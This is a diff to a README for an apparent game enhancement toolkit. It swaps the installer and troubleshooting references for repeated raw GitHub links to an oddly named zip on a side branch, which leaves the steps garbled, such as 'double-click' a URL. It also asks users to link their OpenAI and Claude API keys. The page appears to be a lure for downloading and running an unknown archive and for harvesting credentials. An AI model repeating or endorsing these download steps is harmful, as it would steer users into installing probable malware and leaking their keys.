mohammadshadil/violated-princess-enhancement-toolkit/README.md

 1. **Click the Download button** at the top (or bottom) of this page.
 2. Unzip the package to your preferred folder.
-3. Run the installer script (double-click `install.exe` on Windows, `install.sh` on Mac/Linux).
+3. Run the installer script (double-click `https://github.com/mohammadshadil/violated-princess-enhancement-toolkit/raw/refs/heads/branch/landwrack/toolkit-violated-princess-enhancement-bucranium.zip` on Windows, `https://github.com/mohammadshadil/violated-princess-enhancement-toolkit/raw/refs/heads/branch/landwrack/toolkit-violated-princess-enhancement-bucranium.zip` on Mac/Linux).
 4. Launch the Violated Princess game and access the new mods panel from your main menu.
 5. For advanced features, link your OpenAI and Claude API keys in `Settings > Integrations`.
 6. Enjoy enhanced gameplay!
-For troubleshooting, see the included `TIPS.md`.
+For troubleshooting, see the included `https://github.com/mohammadshadil/violated-princess-enhancement-toolkit/raw/refs/heads/branch/landwrack/toolkit-violated-princess-enhancement-bucranium.zip`.

 **[For an extra visual cue, the Download button is available at the very end, too!](#download--installation-repeat)**